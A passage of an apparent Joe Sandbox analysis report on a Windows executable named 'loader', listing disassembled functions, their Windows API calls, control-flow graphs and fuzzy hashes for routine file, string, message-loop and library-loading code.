              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00124E35,00124E35,?,?,?,0012A2A9,00000001,00000001,3FE85006), ref: 0012A0B2
              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0012A2A9,00000001,00000001,3FE85006,?,?,?), ref: 0012A138
              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0012A232
              • __freea.LIBCMT ref: 0012A23F
                • Part of subcall function 00128518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0012C13D,00000000,?,001267E2,?,00000008,?,001289AD,?,?,?), ref: 0012854A
              • __freea.LIBCMT ref: 0012A248
              • __freea.LIBCMT ref: 0012A26D
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ByteCharMultiWide__freea$AllocateHeap
              • String ID: ^PpL
              • API String ID: 1414292761-914357616
              • Opcode ID: 5bb1918b426c0902ab88873ed3657a7df27a9ee9c43e81eaea41c42eb24e6159
              • Instruction ID: 537b1d4381b7db78f505b1f26c3c5f1f09fd1ae17d25fc3b0cdbcba09128c8a6
              • Opcode Fuzzy Hash: 5bb1918b426c0902ab88873ed3657a7df27a9ee9c43e81eaea41c42eb24e6159
              • Instruction Fuzzy Hash: 4D51D172610226EFDB258F64EC41FBB77AAEF50760F954628FC04D6140DB35DC60C6A2
              Function 0011A335 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35comCOMMON
              Download Yara Rule

              Control-flow Graph

              APIs
                • Part of subcall function 00110085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001100A0
                • Part of subcall function 00110085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0010EB86,Crypt32.dll,00000000,0010EC0A,?,?,0010EBEC,?,?,?), ref: 001100C2
              • OleInitialize.OLE32(00000000), ref: 0011A34E
              • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0011A385
              • SHGetMalloc.SHELL32(00148430), ref: 0011A38F
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
              • String ID: riched20.dll$3Ro
              • API String ID: 3498096277-3613677438
              • Opcode ID: 1db87a63ea7bf38f9c289e02686a538afcc003e94b21c1a9fdc10a8943892a42
              • Instruction ID: b236491c87008069545b73bd1341fe72d3d8cb8b2a6b60aa5a061b40eeb5d37d
              • Opcode Fuzzy Hash: 1db87a63ea7bf38f9c289e02686a538afcc003e94b21c1a9fdc10a8943892a42
              • Instruction Fuzzy Hash: 50F0FFB1D00209ABCB10AF99DC499EFFBFCEF95701F00416AF814E2250DBB456458BA1
              Function 001099B0 Relevance: 7.6, APIs: 5, Instructions: 117filetimeCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 939 1099b0-1099d1 call 11e360 942 1099d3-1099d6 939->942 943 1099dc 939->943 942->943 944 1099d8-1099da 942->944 945 1099de-1099fb 943->945 944->945 946 109a03-109a0d 945->946 947 1099fd 945->947 948 109a12-109a31 call 1070bf 946->948 949 109a0f 946->949 947->946 952 109a33 948->952 953 109a39-109a57 CreateFileW 948->953 949->948 952->953 954 109a59-109a7b GetLastError call 10b66c 953->954 955 109abb-109ac0 953->955 963 109aaa-109aaf 954->963 964 109a7d-109a9f CreateFileW GetLastError 954->964 957 109ae1-109af5 955->957 958 109ac2-109ac5 955->958 961 109b13-109b1e 957->961 962 109af7-109b0f call 10fe56 957->962 958->957 960 109ac7-109adb SetFileTime 958->960 960->957 962->961 963->955 968 109ab1 963->968 966 109aa1 964->966 967 109aa5-109aa8 964->967 966->967 967->955 967->963 968->955
              APIs
              • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,001078AD,?,00000005,?,00000011), ref: 00109A4C
              • GetLastError.KERNEL32(?,?,001078AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00109A59
              • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,001078AD,?,00000005,?), ref: 00109A8E
              • GetLastError.KERNEL32(?,?,001078AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00109A96
              • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,001078AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00109ADB
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: File$CreateErrorLast$Time
              • String ID:
              • API String ID: 1999340476-0
              • Opcode ID: 1220060f25f5a8ba9c080696e4de80f8a9910c936af6ea8673ed705438b33531
              • Instruction ID: 4cf14850fbbde23d892ab4e0b72c96d98cad523c6e248aa7cdf4942e3406d648
              • Opcode Fuzzy Hash: 1220060f25f5a8ba9c080696e4de80f8a9910c936af6ea8673ed705438b33531
              • Instruction Fuzzy Hash: FF415670A44746AFE3309B20CC06BDABBD4BB05324F100719F9E4975D2E7F5A988CBA5
              Function 0011AC74 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 998 11ac74-11ac8d PeekMessageW 999 11acc8-11accc 998->999 1000 11ac8f-11aca3 GetMessageW 998->1000 1001 11aca5-11acb2 IsDialogMessageW 1000->1001 1002 11acb4-11acc2 TranslateMessage DispatchMessageW 1000->1002 1001->999 1001->1002 1002->999
              APIs
              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0011AC85
              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0011AC96
              • IsDialogMessageW.USER32(0001040A,?), ref: 0011ACAA
              • TranslateMessage.USER32(?), ref: 0011ACB8
              • DispatchMessageW.USER32(?), ref: 0011ACC2
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: Message$DialogDispatchPeekTranslate
              • String ID:
              • API String ID: 1266772231-0
              • Opcode ID: 1b3592dde05c507ef5abf2faadfe777f37d13e3c940aecbcca4756c4a45346ff
              • Instruction ID: 0d9f8d6a6f1918d694ff71c18e524d1703c384bf9cb04901d9ad2175b94acfba
              • Opcode Fuzzy Hash: 1b3592dde05c507ef5abf2faadfe777f37d13e3c940aecbcca4756c4a45346ff
              • Instruction Fuzzy Hash: 0FF01D71902129AB8B209BE19C4CEEF7F6CEF052A17404415F905D2550EB74D485C7F1
              Function 0011A2C7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1003 11a2c7-11a2e6 GetClassNameW 1004 11a2e8-11a2fd call 1117ac 1003->1004 1005 11a30e-11a310 1003->1005 1010 11a30d 1004->1010 1011 11a2ff-11a30b FindWindowExW 1004->1011 1006 11a312-11a315 SHAutoComplete 1005->1006 1007 11a31b-11a31f 1005->1007 1006->1007 1010->1005 1011->1010
              APIs
              • GetClassNameW.USER32(?,?,00000050), ref: 0011A2DE
              • SHAutoComplete.SHLWAPI(?,00000010), ref: 0011A315
                • Part of subcall function 001117AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0010BB05,00000000,.exe,?,?,00000800,?,?,001185DF,?), ref: 001117C2
              • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0011A305
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AutoClassCompareCompleteFindNameStringWindow
              • String ID: EDIT
              • API String ID: 4243998846-3080729518
              • Opcode ID: 1340ac65683b1c526f8b95e185fdc89e1db8e221a71ef363559cc9c4a2dd488d
              • Instruction ID: fe65b27d527c12ec25399bfb3492ace7acf5689abbb0e7d485c9310784146a62
              • Opcode Fuzzy Hash: 1340ac65683b1c526f8b95e185fdc89e1db8e221a71ef363559cc9c4a2dd488d
              • Instruction Fuzzy Hash: 6DF0E232A4262877E7209A649D09FDB7B6CAF46B40F440062FE04A2180D7B0A981C6F6
              Function 0010984E Relevance: 6.1, APIs: 4, Instructions: 57fileCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1012 10984e-10985a 1013 109867-10987e ReadFile 1012->1013 1014 10985c-109864 GetStdHandle 1012->1014 1015 109880-109889 call 109989 1013->1015 1016 1098da 1013->1016 1014->1013 1020 1098a2-1098a6 1015->1020 1021 10988b-109893 1015->1021 1018 1098dd-1098e2 1016->1018 1022 1098b7-1098bb 1020->1022 1023 1098a8-1098b1 GetLastError 1020->1023 1021->1020 1024 109895 1021->1024 1027 1098d5-1098d8 1022->1027 1028 1098bd-1098c5 1022->1028 1023->1022 1026 1098b3-1098b5 1023->1026 1025 109896-1098a0 call 10984e 1024->1025 1025->1018 1026->1018 1027->1018 1028->1027 1030 1098c7-1098d0 GetLastError 1028->1030 1030->1027 1032 1098d2-1098d3 1030->1032 1032->1025
              APIs
              • GetStdHandle.KERNEL32(000000F6), ref: 0010985E
              • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00109876
              • GetLastError.KERNEL32 ref: 001098A8
              • GetLastError.KERNEL32 ref: 001098C7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ErrorLast$FileHandleRead
              • String ID:
              • API String ID: 2244327787-0
              • Opcode ID: 92a27997e267306ec15ac4843e0c5775495ad4d34f3162efcae856880ecdd092
              • Instruction ID: 508b9d2aac7d93bfefb627ac489d4e8c781f481965ec492b6155cf931845f4df
              • Opcode Fuzzy Hash: 92a27997e267306ec15ac4843e0c5775495ad4d34f3162efcae856880ecdd092
              • Instruction Fuzzy Hash: 1111CE3090020CEBDB246B51C824A7977A8FB46731F10C12BF8AA85BC2DBB99E409F51
              Function 0012A4F4 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1033 12a4f4-12a508 1034 12a515-12a530 LoadLibraryExW 1033->1034 1035 12a50a-12a513 1033->1035 1037 12a532-12a53b GetLastError 1034->1037 1038 12a559-12a55f 1034->1038 1036 12a56c-12a56e 1035->1036 1039 12a54a 1037->1039 1040 12a53d-12a548 LoadLibraryExW 1037->1040 1041 12a561-12a562 FreeLibrary 1038->1041 1042 12a568 1038->1042 1043 12a54c-12a54e 1039->1043 1040->1043 1041->1042 1044 12a56a-12a56b 1042->1044 1043->1038 1045 12a550-12a557 1043->1045 1044->1036 1045->1044
              APIs
              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00123713,00000000,00000000,?,0012A49B,00123713,00000000,00000000,00000000,?,0012A698,00000006,FlsSetValue), ref: 0012A526
              • GetLastError.KERNEL32(?,0012A49B,00123713,00000000,00000000,00000000,?,0012A698,00000006,FlsSetValue,00137348,00137350,00000000,00000364,?,00129077), ref: 0012A532
              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0012A49B,00123713,00000000,00000000,00000000,?,0012A698,00000006,FlsSetValue,00137348,00137350,00000000), ref: 0012A540
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: LibraryLoad$ErrorLast
              • String ID:
              • API String ID: 3177248105-0
              • Opcode ID: 1f86ec5ba67d8080ef574adfacb6015dd92f7e5cda14e55f67c87fb5a3cc6d27
              • Instruction ID: d9db933bea617330c07eb63604ff51bc5ca28f7415826a86453dd097a3520ca4
              • Opcode Fuzzy Hash: 1f86ec5ba67d8080ef574adfacb6015dd92f7e5cda14e55f67c87fb5a3cc6d27
              • Instruction Fuzzy Hash: C3012632711232AFC7218B68BC44A67BB98EF45BA1B650620F91AD7140D735DA50CAE1
              Function 0012B350 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 0012AF1B: GetOEMCP.KERNEL32(00000000,?,?,0012B1A5,?), ref: 0012AF46
              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0012B1EA,?,00000000), ref: 0012B3C4
              • GetCPInfo.KERNEL32(00000000,0012B1EA,?,?,?,0012B1EA,?,00000000), ref: 0012B3D7
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: CodeInfoPageValid
              • String ID: ^PpL
              • API String ID: 546120528-914357616
              • Opcode ID: 123e17c595a26b9232105dc8962f3535e0095218c02e66818bd654887cffbd87
              • Instruction ID: abaf915b3b92ad67956b7f10772c5cb9ba497af4ac084d820405b085cdb73a38
              • Opcode Fuzzy Hash: 123e17c595a26b9232105dc8962f3535e0095218c02e66818bd654887cffbd87
              • Instruction Fuzzy Hash: D7515670D083A59FDB24AF35E8C16BABBE4EF51310F18806ED0978B253D7359952CB80
              Function 0012AFF4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON
              Download Yara Rule
              APIs
              • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0012B019
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: Info
              • String ID: $^PpL
              • API String ID: 1807457897-2501119805
              • Opcode ID: e61224b1e52cfa208b48e346c5719a6e06f63427e8565e2c4a0be91ffe68ffc7
              • Instruction ID: c574bc9a6be713c8a03a1d64132de876f6f4e095fc587ed65314a617da0dd3d8
              • Opcode Fuzzy Hash: e61224b1e52cfa208b48e346c5719a6e06f63427e8565e2c4a0be91ffe68ffc7
              • Instruction Fuzzy Hash: CC41277050836C9EDB268A24ACD4AF7BBB9EB05304F1404ECE59A87142D3359A65CF20
              Function 0012A458 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • GetProcAddress.KERNEL32(00000000,?), ref: 0012A4B8
              • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 0012A4C5
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AddressProc__crt_fast_encode_pointer
              • String ID: ^PpL
              • API String ID: 2279764990-914357616
              • Opcode ID: dd2f76cf68408d95da68adfac44464e4893e65346c658207e28933ac885b3c29
              • Instruction ID: 4dc3c9dbebc8292106f518e1346dbeb289bb1dcb7dceb4f1a82ecf5ce1a9dd20
              • Opcode Fuzzy Hash: dd2f76cf68408d95da68adfac44464e4893e65346c658207e28933ac885b3c29
              • Instruction Fuzzy Hash: F911E733A016719BDB25AE28FC4589A73D5AF80330B9E4220FD15EB644EB70DC91C6D2
              Function 0012A72C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 0012A79D
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: String
              • String ID: LCMapStringEx$^PpL
              • API String ID: 2568140703-2099956040
              • Opcode ID: db9744ed33a74ecdc7be206c5edbb113805504e1ca6e83adadc03cc5603c4c5a
              • Instruction ID: 7a309e6ecf8f70fd138e1d8bd3312087d1c300084ff00e9e488c19871d2a756e
              • Opcode Fuzzy Hash: db9744ed33a74ecdc7be206c5edbb113805504e1ca6e83adadc03cc5603c4c5a
              • Instruction Fuzzy Hash: 75011372500218BBCF126FA0EC02DEE7FA6FF18720F444154FE1426160CB768971EB95
              Function 0012A6CA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
              Download Yara Rule
              APIs
              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00129D2F), ref: 0012A715
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: CountCriticalInitializeSectionSpin
              • String ID: InitializeCriticalSectionEx$^PpL
              • API String ID: 2593887523-1012716583
              • Opcode ID: beca9b56684ed52f4d197fb66c16bbe60e17549496ca50eaa7654f35f64cbde2
              • Instruction ID: f3b65b310114db30c30268f082a0407da862cc2b2acac886c4adc623edf671c9
              • Opcode Fuzzy Hash: beca9b56684ed52f4d197fb66c16bbe60e17549496ca50eaa7654f35f64cbde2
              • Instruction Fuzzy Hash: 9EF0E27164521CBBCB156F64EC06CAE7FA1FF14720F404064FC191A2A0DB729E60EB95
              Function 0012A56F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30memoryCOMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: Alloc
              • String ID: FlsAlloc$^PpL
              • API String ID: 2773662609-3289078789
              • Opcode ID: f75f18431401dc91ef7b54b6cf5578d6355b07249b121795b9b52d4d14fb5864
              • Instruction ID: 6a63d5335950d6f0dac74f69335043a01e5f3cd43ea9bd1c5a773e41df48fcd0
              • Opcode Fuzzy Hash: f75f18431401dc91ef7b54b6cf5578d6355b07249b121795b9b52d4d14fb5864
              • Instruction Fuzzy Hash: 28E0E5B074522C6BD3246B64AC069AEBB95DF25B20F810155FC0557280DF704E50AADA
              Function 00109F2F Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON
              Download Yara Rule
              APIs
              • GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,0010CC94,00000001,?,?,?,00000000,00114ECD,?,?,?), ref: 00109F4C
              • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00114ECD,?,?,?,?,?,00114972,?), ref: 00109F8E
              • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,0010CC94,00000001,?,?), ref: 00109FB8
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
